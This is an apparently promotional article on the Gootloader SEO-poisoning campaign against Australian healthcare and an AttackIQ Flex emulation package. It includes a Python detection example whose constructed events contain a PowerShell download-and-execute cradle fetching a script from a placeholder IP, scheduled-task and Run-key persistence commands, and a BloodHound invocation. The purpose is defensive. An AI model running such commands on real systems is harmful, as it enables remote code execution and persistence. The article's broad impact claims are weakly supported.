Gootloader Attacks Healthcare Down Under

Australia's healthcare sector faces mounting cybersecurity challenges as threat actors increasingly target healthcare institutions. This article examines the Gootloader campaign against the Australian healthcare sector and the importance of robust defenses for protecting patient data and essential healthcare services.

As cyber threats proliferate worldwide, no sector is immune. In Australia, the healthcare sector has found itself at the forefront: recent reporting shows that the operators behind Gootloader have been targeting Australian healthcare organizations. In this article we examine the 2023 Gootloader campaign aimed at the Australian healthcare sector and the newly released AttackIQ Flex package that lets you emulate it against your own security controls.

Understanding Gootloader

Gootloader is a JavaScript-based malware loader, named for its historical association with the Gootkit banking trojan, that is used to deliver a range of follow-on payloads, including ransomware, banking trojans and post-exploitation tooling. Its operators rely primarily on SEO poisoning rather than exploit kits or spam: search results for specific queries are manipulated so that a victim looking for a document lands on a page offering a malicious download. Once the user runs the downloaded script, the loader establishes a foothold that the attackers use to access systems, steal data and stage further activity on the network.

In the 2023 campaign against the Australian healthcare sector, Gootloader's operators combined SEO poisoning with social engineering to get staff at multiple healthcare organizations to run the loader, giving the attackers access to internal systems and, with it, the ability to compromise patient data and disrupt essential healthcare services.

Trend Micro's report, released in January 2023, detailed the infection routine and noted that Gootloader had extended its attacks into the healthcare industry, specifically targeting Australia. The initial access vector was SEO poisoning built around keywords related to the healthcare sector combined with the names of Australian cities. A victim searching for such a term was led to download a malicious ZIP archive containing a JavaScript (JS) file whose name was built from the search-query words, most often ones associated with "agreement".

Impact on Healthcare Services

The attack had far-reaching consequences, significantly disrupting healthcare services across the affected organizations. Hospital systems were paralyzed, delaying patient care, forcing appointments to be cancelled and making medical records hard to access. The compromise of patient data also raised concerns about privacy violations and the potential for identity theft.

The attack underscored the inherent vulnerabilities of the healthcare sector and the need for comprehensive cybersecurity strategies and resilient infrastructure. Healthcare organizations face particular challenges in defending against cyber threats: complex interconnected systems, legacy IT infrastructure and a growing fleet of connected medical devices. The high value of healthcare data also makes it an attractive target for actors with financial or political motives.

Simulating the Attack with AttackIQ Flex’s New Package

Given the evolving threat landscape and the sophistication of attacks like the Gootloader campaign, organizations, especially those in sensitive sectors such as healthcare, must proactively assess and strengthen their cybersecurity defenses.

To meet this need, AttackIQ has introduced a new package in its AttackIQ Flex platform specifically designed to emulate the Gootloader attack on the Australian healthcare sector. AttackIQ Flex lets organizations test their security controls on demand. It revolutionizes the breach and attack simulation market by offering testing as a service, removing the obstacles of price, complexity and time that have kept organizations from comprehensive testing in the past.

The package includes a set of attack scenarios based on the Trend Micro report detailing Gootloader's infection routine. By replicating the tactics, techniques and procedures (TTPs) employed by Gootloader, AttackIQ Flex enables organizations to identify gaps in their security posture and prioritize remediation accordingly.

Scenarios included in this package:

  • Save 2022-12 PowerShell Script so.ps1 Sample to File System
  • Native API
  • DLL Side-Loading
  • System Information Discovery via “GetComputerNameExW” Native API
  • System Drive Information Discovery via “DeviceIoControl” Native API
  • Download 2022-12 PowerShell Script so.ps1 Sample to Memory
  • Save 2022-11 PowerShell BloodHound Sample to File System
  • Save 2022-04 GootLoader Malicious JS Sample to File System
  • Code Injection via Load Library and Create Remote Thread
  • Discover Processes via “Get-Process” PowerShell Command
  • Download 2022-04 GootLoader Malicious ZIP Sample to Memory
  • Save 2022-11 libvls.dll Sample to File System
  • Dump Passwords using PwDump7
  • BloodHound Ingestor Execution
  • Persistence Through Registry Run and RunOnce Keys
  • Download 2022-11 PowerShell BloodHound Sample to Memory
  • Open Ports Checker
  • JavaScript File Execution via “cscript.exe” Script
  • Save 2022-04 GootLoader Malicious ZIP Sample to File System
  • Persistence Through Scheduled Task
  • System Owner/User Discovery via “GetUserNameW” Native API
  • Discover Files and Directories via Powershell Script
  • Download 2022-11 libvls.dll Sample to Memory
  • Create Registry Entry
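Before running the package, it is worth checking that your endpoint telemetry would actually surface the behaviours these scenarios exercise. The following is an added example, not code from the original page, AttackIQ or Trend Micro: a handful of detection rules mapped to five of the scenarios above, run over constructed Sysmon-style events. The event field names, paths, task name, IP address and hostnames are assumptions made up for the example, and the rules are deliberately simple so that the mapping stays readable.

```python
"""Map constructed endpoint telemetry to scenarios in the Gootloader package.

Added example, not from the original page. Event fields are a simplified, assumed
Sysmon-like shape; all paths, names and addresses in SAMPLE_EVENTS are constructed.
"""
import re
from typing import Dict, List

Event = Dict[str, str]

SAMPLE_EVENTS: List[Event] = [
    # 0: script host running a lure .js from Downloads (initial execution)
    {"type": "process", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe "C:\Users\jane\Downloads\nsw health agreement 3421.js"',
     "parent": r"C:\Windows\explorer.exe"},
    # 1: Run key pointing at a script in the user's profile (persistence)
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"wscript.exe C:\Users\jane\AppData\Roaming\Updater\update.js"},
    # 2: scheduled task creation from the script host (persistence)
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 5 /tn Updater /tr "wscript.exe C:\Users\jane\AppData\Roaming\Updater\update.js"',
     "parent": r"C:\Windows\System32\wscript.exe"},
    # 3: PowerShell download cradle pulling a script straight into memory
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/so.ps1')\"",
     "parent": r"C:\Windows\System32\wscript.exe"},
    # 4: BloodHound ingestor run from PowerShell (discovery)
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"Invoke-BloodHound -CollectionMethod All\"",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # 5: benign vendor maintenance script run from Program Files by a service
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Program Files\Backup\cleanup.vbs"',
     "parent": r"C:\Windows\System32\services.exe"},
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData|Desktop)\\|\\Temp\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)


def base(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def script_host_from_user_path(e: Event) -> bool:
    # Scenario: JavaScript File Execution via "cscript.exe" Script
    return (e["type"] == "process" and base(e["image"]) in ("cscript.exe", "wscript.exe")
            and ".js" in e["cmdline"].lower() and bool(USER_WRITABLE.search(e["cmdline"])))


def run_key_persistence(e: Event) -> bool:
    # Scenario: Persistence Through Registry Run and RunOnce Keys
    return e["type"] == "registry" and bool(RUN_KEY.search(e["key"]))


def scheduled_task_persistence(e: Event) -> bool:
    # Scenario: Persistence Through Scheduled Task
    return (e["type"] == "process" and base(e["image"]) == "schtasks.exe"
            and "/create" in e["cmdline"].lower())


def powershell_download_cradle(e: Event) -> bool:
    # Scenario: Download 2022-12 PowerShell Script so.ps1 Sample to Memory
    c = e.get("cmdline", "").lower()
    return (e["type"] == "process" and base(e["image"]) == "powershell.exe"
            and "downloadstring" in c and ("iex" in c or "invoke-expression" in c))


def bloodhound_ingestor(e: Event) -> bool:
    # Scenario: BloodHound Ingestor Execution
    c = e.get("cmdline", "").lower()
    return e["type"] == "process" and ("invoke-bloodhound" in c or "sharphound" in c)


RULES = {
    'JavaScript File Execution via "cscript.exe" Script': script_host_from_user_path,
    "Persistence Through Registry Run and RunOnce Keys": run_key_persistence,
    "Persistence Through Scheduled Task": scheduled_task_persistence,
    "Download 2022-12 PowerShell Script so.ps1 Sample to Memory": powershell_download_cradle,
    "BloodHound Ingestor Execution": bloodhound_ingestor,
}


def covered_scenarios(events: List[Event]) -> Dict[str, List[int]]:
    """Return {scenario: [indices of matching events]} for every scenario with a hit."""
    hits: Dict[str, List[int]] = {}
    for i, e in enumerate(events):
        for scenario, rule in RULES.items():
            if rule(e):
                hits.setdefault(scenario, []).append(i)
    return hits


if __name__ == "__main__":
    hits = covered_scenarios(SAMPLE_EVENTS)
    for scenario, idx in hits.items():
        print(f"{scenario}: events {idx}")
    print("Not covered:", sorted(set(RULES) - set(hits)))
```

Run against a real export of your process, registry and task telemetry, the "Not covered" list is the gap to close before the Flex run; the benign event at index 5 is there to show that the script-host rule keys on a user-writable path, not on wscript.exe alone.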
The Gootloader attack on the Australian healthcare sector underscores the urgent need for stronger cybersecurity measures and collaborative efforts to protect critical infrastructure and patient information. With AttackIQ Flex's new package, organizations can assess how well their security controls detect and mitigate threats like Gootloader. Through continuous validation and optimization of their defenses, organizations can improve their resilience against evolving threats and better protect their critical assets and sensitive data.

Key Points:

  1. Gootloader Threat: Gootloader, a JavaScript-based malware loader, has targeted the Australian healthcare sector with advanced delivery techniques, posing significant risks to sensitive data and critical infrastructure.
  2. Attack Techniques: Gootloader relies on SEO poisoning to deliver malicious ZIP archives containing JavaScript files. In this campaign the poisoned search terms combined healthcare-related keywords with Australian city names, showing how the lure is tailored to the targeted sector.
  3. Impact on Healthcare Services: The attack caused substantial disruption to healthcare services, including paralyzed hospital systems, delays in patient care and privacy concerns over compromised data. This highlights the vulnerability of the healthcare sector and the need for robust cybersecurity measures.
  4. Cybersecurity Solutions: Recognizing the importance of proactive defense, AttackIQ has introduced a new package in its AttackIQ Flex platform. The package emulates the Gootloader attack, letting organizations test their security controls, identify gaps and prioritize remediation.
  5. Conclusion and Recommendations: The Gootloader attack emphasizes the need for stronger cybersecurity measures and collaborative efforts to protect critical infrastructure and patient information. By using tools like AttackIQ Flex and continuously validating their defenses, organizations can strengthen their resilience against evolving cyber threats and safeguard their assets.